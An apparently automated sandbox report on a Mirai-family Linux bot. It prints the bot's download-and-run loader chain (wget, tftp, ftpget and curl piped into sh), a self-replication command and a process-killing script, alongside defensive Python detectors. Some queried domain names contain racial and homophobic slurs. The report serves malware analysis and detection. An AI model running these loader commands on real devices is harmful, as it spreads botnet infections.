Linux Analysis Report
GcOeQTPzrh.elf

Overview

General Information

Sample name: GcOeQTPzrh.elf
Renamed because the original name is a hash value.
Original sample name: 553097f42a705959d8ac6fa18ef66402.elf
Analysis ID: 1432450
MD5: 553097f42a705959d8ac6fa18ef66402
SHA1: 5b080cba5797148f29a2db09ee3c6966fe295c5f
SHA256: 853b73f9ecd2f7e8a75e9a45292ad6978b420e9bb5ee9b09010bfe88c514115e
Tags: 32, elf, mirai, sparc

Detection

Score: 52
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

AV Detection

Source: GcOeQTPzrh.elf ReversingLabs: Detection: 55%
Source: GcOeQTPzrh.elf Virustotal: Detection: 33%
Source: GcOeQTPzrh.elf String: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
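The string above is the bot's download-and-execute chain: four fetch methods in a row (busybox wget, busybox tftp -g, busybox ftpget, curl), each piped straight into sh, plus the echo -ne fragment that writes a dotfile byte by byte and the chmod +x .d; ./.d; ./dvrHelper selfrep stage. Note that the host part of the URLs is absent from the static string (http:///wget.sh), so a URL-based indicator would miss it. The following Python is an added example, not report output and not the sample's code: a scorer over shell command lines such as those seen in auditd execve records or a telnet honeypot. LOADER_CHAIN and CHMOD_EXEC are the report's strings verbatim; ECHO_DROP and BENIGN are constructed; the indicator weights and the threshold are this example's own choices.

```python
import re

# Indicator patterns built from the loader strings in this report. The weights and
# the threshold are this example's own choice, not anything the report defines.
INDICATORS = [
    (re.compile(r"\bbusybox\s+(?:wget|tftp|ftpget)\b"), 2, "busybox network fetch"),
    (re.compile(r"\|\s*(?:/bin/)?sh\b"), 3, "fetched content piped into sh"),
    (re.compile(r"&&\s*sh\s+\S+"), 2, "fetched script run with sh"),
    (re.compile(r"\btftp\s+-g\b"), 2, "tftp get"),
    (re.compile(r"\becho\s+-n?e\b[^;|&]*>>?\s*\.\w+"), 3, "echo -e/-ne into a dotfile"),
    (re.compile(r"\\x7f\\x45\\x4c\\x46", re.I), 3, "ELF magic written as hex escapes"),
    (re.compile(r"\bchmod\s+\+x\s+\.\w+\s*;\s*\./\.\w+"), 3, "chmod +x then exec of a dotfile"),
    (re.compile(r"\bdvrHelper\b"), 3, "dvrHelper binary name"),
    (re.compile(r"\bselfrep\b"), 2, "selfrep argument"),
]


def score_command_line(line):
    """Return (score, matched indicator labels) for one shell command line."""
    score, hits = 0, []
    for rx, weight, label in INDICATORS:
        if rx.search(line):
            score += weight
            hits.append(label)
    return score, hits


def is_loader_like(line, threshold=5):
    """True when enough loader indicators co-occur on one command line."""
    return score_command_line(line)[0] >= threshold


# Report strings, verbatim (the empty host in http:/// is how the report prints them).
LOADER_CHAIN = ("/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;"
                "/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh")
CHMOD_EXEC = "/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"

# Constructed lines (not from the report): an echo-based drop of an ELF header, and a
# benign package download that must stay below the threshold.
ECHO_DROP = r"/bin/busybox echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00' >> .k"
BENIGN = "/bin/busybox wget http://mirror.example/pkg.ipk -O /tmp/pkg.ipk"

if __name__ == "__main__":
    for name, line in [("loader chain", LOADER_CHAIN), ("chmod/exec", CHMOD_EXEC),
                       ("echo drop", ECHO_DROP), ("benign", BENIGN)]:
        score, hits = score_command_line(line)
        print("%-12s score=%d loader-like=%s %s" % (name, score, is_loader_like(line), hits))
```

Single fragments such as the echo -ne line score below the threshold on their own; in practice, score all command lines from one session together, since the loader issues these stages one after another.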

Networking

Source: global traffic DNS traffic detected: malformed DNS query: infectedslurs.geek. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: yellowchink.pirate. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: w3d0ntlikebot5.parody. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: hiakamai.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: freethewind.parody. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: netfags.geek. [malformed]
Source: global traffic DNS traffic detected: malformed DNS query: dogeatingchink.parody. [malformed]
Source: global traffic TCP traffic: 192.168.2.23:37208 -> 204.76.203.223:38241
Source: /tmp/GcOeQTPzrh.elf (PID: 6238) Socket: 127.0.0.1::39148
Source: unknown TCP traffic detected without corresponding DNS query: 168.195.22.93
Source: unknown TCP traffic detected without corresponding DNS query: 3.79.81.223
Source: unknown TCP traffic detected without corresponding DNS query: 174.200.151.232
Source: unknown TCP traffic detected without corresponding DNS query: 156.53.26.87
Source: unknown TCP traffic detected without corresponding DNS query: 109.240.159.92
Source: unknown TCP traffic detected without corresponding DNS query: 52.215.196.204
Source: unknown TCP traffic detected without corresponding DNS query: 198.40.19.67
Source: unknown TCP traffic detected without corresponding DNS query: 131.178.208.104
Source: unknown TCP traffic detected without corresponding DNS query: 221.118.126.217
Source: unknown TCP traffic detected without corresponding DNS query: 119.149.120.184
Source: unknown TCP traffic detected without corresponding DNS query: 194.208.202.50
Source: unknown TCP traffic detected without corresponding DNS query: 32.103.19.249
Source: unknown TCP traffic detected without corresponding DNS query: 220.21.19.159
Source: unknown TCP traffic detected without corresponding DNS query: 175.30.186.233
Source: unknown TCP traffic detected without corresponding DNS query: 157.87.225.124
Source: unknown TCP traffic detected without corresponding DNS query: 206.158.222.25
Source: unknown TCP traffic detected without corresponding DNS query: 99.218.254.201
Source: unknown TCP traffic detected without corresponding DNS query: 80.203.77.13
Source: unknown TCP traffic detected without corresponding DNS query: 130.246.82.156
Source: unknown TCP traffic detected without corresponding DNS query: 133.52.80.254
Source: unknown TCP traffic detected without corresponding DNS query: 113.60.230.122
Source: unknown TCP traffic detected without corresponding DNS query: 102.155.192.243
Source: unknown TCP traffic detected without corresponding DNS query: 115.103.192.161
Source: unknown TCP traffic detected without corresponding DNS query: 221.17.36.168
Source: unknown TCP traffic detected without corresponding DNS query: 93.54.154.195
Source: unknown TCP traffic detected without corresponding DNS query: 120.73.74.199
Source: unknown TCP traffic detected without corresponding DNS query: 155.87.158.100
Source: unknown TCP traffic detected without corresponding DNS query: 50.115.30.183
Source: unknown TCP traffic detected without corresponding DNS query: 220.135.143.225
Source: unknown TCP traffic detected without corresponding DNS query: 7.138.249.127
Source: unknown TCP traffic detected without corresponding DNS query: 180.166.251.117
Source: unknown TCP traffic detected without corresponding DNS query: 7.121.78.50
Source: unknown TCP traffic detected without corresponding DNS query: 76.51.24.100
Source: unknown TCP traffic detected without corresponding DNS query: 219.50.49.67
Source: unknown TCP traffic detected without corresponding DNS query: 188.213.49.29
Source: unknown TCP traffic detected without corresponding DNS query: 180.195.87.183
Source: unknown TCP traffic detected without corresponding DNS query: 172.93.49.115
Source: unknown TCP traffic detected without corresponding DNS query: 180.194.157.155
Source: unknown TCP traffic detected without corresponding DNS query: 9.119.194.53
Source: unknown TCP traffic detected without corresponding DNS query: 216.49.184.61
Source: unknown TCP traffic detected without corresponding DNS query: 58.52.66.110
Source: unknown TCP traffic detected without corresponding DNS query: 201.58.201.203
Source: unknown TCP traffic detected without corresponding DNS query: 92.239.230.204
Source: unknown TCP traffic detected without corresponding DNS query: 24.83.131.107
Source: unknown TCP traffic detected without corresponding DNS query: 165.36.26.54
Source: unknown TCP traffic detected without corresponding DNS query: 7.60.11.172
Source: unknown TCP traffic detected without corresponding DNS query: 9.231.105.235
Source: unknown TCP traffic detected without corresponding DNS query: 147.47.34.119
Source: unknown TCP traffic detected without corresponding DNS query: 211.9.187.93
Source: unknown TCP traffic detected without corresponding DNS query: 46.158.247.72
Source: global traffic DNS traffic detected: DNS query: dogeatingchink.parody
Source: global traffic DNS traffic detected: DNS query: infectedslurs.geek. [malformed]
Source: global traffic DNS traffic detected: DNS query: yellowchink.pirate. [malformed]
Source: global traffic DNS traffic detected: DNS query: w3d0ntlikebot5.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: hiakamai.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: freethewind.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: chinklabs.dyn. [malformed]
Source: global traffic DNS traffic detected: DNS query: netfags.geek. [malformed]
Source: global traffic DNS traffic detected: DNS query: dogeatingchink.parody. [malformed]
Source: global traffic DNS traffic detected: DNS query: infectedchink.pirate
Source: GcOeQTPzrh.elf String found in binary or memory: http:///curl.sh
Source: GcOeQTPzrh.elf String found in binary or memory: http:///wget.sh
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57484
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57484 -> 443
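Two patterns in the network section are worth turning into detections. First, every queried name ends in .geek, .pirate, .parody or .dyn; these top-level domains are served by the OpenNIC alternative root, not the ICANN root, so a normal resolver answers NXDOMAIN for them. The report marks the queries as malformed without saying how, so the check below keys on the TLD, which is visible from the name alone. Second, the sample opens TCP connections to around fifty addresses for which no DNS query was seen, plus the connection to 204.76.203.223:38241 on a non-standard port. The following Python is an added example, not report output, that runs both checks over a constructed event log: the names, the C2 address and port, and the scanned addresses are taken from the report; the benign updates.example lookup and the destination port 23 for the scanned hosts are assumptions; the OpenNIC TLD list is partial and should be checked against the current list.

```python
from collections import Counter

# Top-level domains served by the OpenNIC alternative root rather than the ICANN root.
# Partial list (assumption: verify against OpenNIC's current TLD list before relying
# on it); the four TLDs queried in this report are included.
ALT_ROOT_TLDS = {"bbs", "chan", "cyb", "dyn", "epic", "geek", "gopher", "indy",
                 "libre", "neo", "null", "o", "oss", "oz", "parody", "pirate"}


def tld_of(qname):
    """Last non-empty label of a query name, lower-cased ('a.b.geek.' -> 'geek')."""
    labels = [l for l in qname.lower().split(".") if l]
    return labels[-1] if labels else ""


def alt_root_tld_queries(events):
    """Query names whose TLD an ICANN-root resolver will never answer."""
    return sorted({e["qname"].rstrip(".") for e in events
                   if e["type"] == "dns_query" and tld_of(e["qname"]) in ALT_ROOT_TLDS})


def dns_less_connections(events):
    """Destinations of TCP connections not preceded by a DNS answer carrying that address.

    Events are processed in order: an answer seen after the connection does not
    retroactively explain it."""
    resolved, hits = set(), []
    for e in events:
        if e["type"] == "dns_answer":
            resolved.update(e["addrs"])
        elif e["type"] == "tcp" and e["dst"] not in resolved:
            hits.append(e["dst"])
    return hits


def summarize(events, scan_threshold=10):
    """Return (verdict strings, connection count per destination port)."""
    verdicts = []
    alt = alt_root_tld_queries(events)
    if alt:
        verdicts.append("alt-root TLD lookups: " + ", ".join(alt))
    hard_coded = set(dns_less_connections(events))
    if len(hard_coded) >= scan_threshold:
        verdicts.append("%d distinct destinations contacted without DNS (hard-coded targets)"
                        % len(hard_coded))
    ports = Counter(e["dport"] for e in events if e["type"] == "tcp")
    return verdicts, dict(ports)


# Constructed event log modelled on this report's network section. The DNS names, the
# C2 connection (204.76.203.223:38241) and the scanned addresses are from the report;
# the benign updates.example lookup and destination port 23 for the scanned hosts are
# assumptions (the report does not list those ports).
SAMPLE_EVENTS = [
    {"type": "dns_query", "qname": "infectedslurs.geek."},
    {"type": "dns_query", "qname": "yellowchink.pirate."},
    {"type": "dns_query", "qname": "hiakamai.dyn."},
    {"type": "dns_query", "qname": "freethewind.parody."},
    {"type": "dns_query", "qname": "updates.example."},
    {"type": "dns_answer", "qname": "updates.example.", "addrs": ["198.51.100.7"]},
    {"type": "tcp", "dst": "198.51.100.7", "dport": 443},
    {"type": "tcp", "dst": "204.76.203.223", "dport": 38241},
] + [
    {"type": "tcp", "dst": ip, "dport": 23} for ip in (
        "168.195.22.93", "3.79.81.223", "174.200.151.232", "156.53.26.87",
        "109.240.159.92", "52.215.196.204", "198.40.19.67", "131.178.208.104",
        "221.118.126.217", "119.149.120.184")
]

if __name__ == "__main__":
    verdicts, ports = summarize(SAMPLE_EVENTS)
    for line in verdicts:
        print(line)
    print("connections per destination port:", ports)
```

The DNS-less check needs the answer records, not just the queries, so feed it resolver logs or passive DNS rather than query logs alone; a host that resolves a name through DNS over HTTPS will look hard-coded to this check and should be allow-listed by resolver address.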

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample String containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/tmp//var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
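The hex-escaped blob in the last string above is a C string literal carried as data; decoded, it is a POSIX shell script. The following Python is an added example, not part of the report and not the sample's own code, that decodes the blob (its only input is the string copied from the report) and splits the run-together architecture tag list that follows it. The decoded script loops over /proc, runs ls -l on each process's exe link and sends SIGKILL to every process whose link target ends in (deleted), that is, whose executable was unlinked after it started. That removes competing bots that delete their own binary once running, and it will equally kill any legitimate daemon whose binary was replaced by a package upgrade and not yet restarted. The deleted_exe_pids helper is the defender's read-only form of the same check.

```python
import os
import re

# The escaped blob exactly as printed in the string dump above: a run of C string
# literals (adjacent "..." "..." pieces concatenate) followed by the run-together
# architecture tag list. This is report data, not constructed input.
REPORT_BLOB = (
    r'"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63"'
    r'"\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A"'
    r'"\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65"'
    r'"\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65"'
    r'"\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D"'
    r'"\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20"'
    r'"\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"'
    r'armarm5arm6arm7mipsmpslppcspcsh4'
)

_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')   # body of one C string literal
_HEX_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})')    # one \xNN escape


def decode_c_literals(text):
    """Concatenate adjacent C string literals and resolve their hex escapes."""
    joined = "".join(_LITERAL.findall(text))
    return _HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), joined)


# Longest tags first so that "arm5" is not read as "arm" followed by junk.
ARCH_TAGS = ("arm5", "arm6", "arm7", "arm", "mips", "mpsl", "ppc", "spc", "sh4")


def split_arch_tags(run):
    """Split a run-together tag list such as 'armarm5...' into its tags."""
    out, i = [], 0
    while i < len(run):
        for tag in ARCH_TAGS:
            if run.startswith(tag, i):
                out.append(tag)
                i += len(tag)
                break
        else:
            raise ValueError("unknown tag at offset %d: %r" % (i, run[i:]))
    return out


def parse_report_blob(blob):
    """Return (decoded shell script, architecture tag list) for the report string."""
    end = blob.rindex('"') + 1
    return decode_c_literals(blob[:end]), split_arch_tags(blob[end:])


def is_deleted_exe(ls_output):
    """The decoded script's test: the pattern-strip comparison it makes is true
    exactly when the ls -l output for /proc/<pid>/exe ends in (deleted)."""
    return ls_output.rstrip("\n").endswith("(deleted)")


def deleted_exe_pids(proc="/proc"):
    """Defender's counterpart: list running PIDs whose executable has been unlinked.
    Read-only, kills nothing; returns [] on systems without /proc."""
    found = []
    if not os.path.isdir(proc):
        return found
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc, entry, "exe"))
        except OSError:          # kernel threads, vanished or unreadable processes
            continue
        if target.endswith("(deleted)"):
            found.append((int(entry), target))
    return found


if __name__ == "__main__":
    script, tags = parse_report_blob(REPORT_BLOB)
    print(script)
    print("architecture tags:", tags)
    print("processes running from deleted binaries:", deleted_exe_pids())
```

On a Linux host the last line lists every process in the (deleted) state, which is also where a self-unlinking bot shows up; treat a hit in /tmp, /dev/shm or another world-writable path as a higher-priority finding than a hit under /usr after an upgrade.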

Sample has stripped symbol table

Source: ELF static info symbol of initial sample .symtab present: no

Classification

Source: classification engine Classification label: mal52.troj.linELF@0/334@12/0

Enumerates processes within the "proc" file system

Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6311/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6310/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6313/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6312/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6270/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6272/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6271/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6304/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6304/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6248/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6303/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6303/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6306/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6306/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6305/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6305/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6308/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6307/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6307/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6309/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6263/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6263/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6262/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6262/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6265/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6265/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6320/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6264/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6264/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6267/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6266/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6269/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6302/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6302/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6268/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6301/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6301/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6261/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6261/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6260/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6260/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6315/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6314/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6317/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6316/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/cmdline
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/maps
Source: /tmp/GcOeQTPzrh.elf (PID: 6244) File opened: /proc/6319/cmdline

Executes the "rm" command used to delete files or directories

Source: /usr/bin/dash (PID: 6299) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.UQEbML9pKR /tmp/tmp.MxD8c0WHrz /tmp/tmp.gi5gwjlr7Q
Source: /usr/bin/dash (PID: 6300) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.UQEbML9pKR /tmp/tmp.MxD8c0WHrz /tmp/tmp.gi5gwjlr7Q

Uses the "uname" system call to query kernel version information (possible evasion)

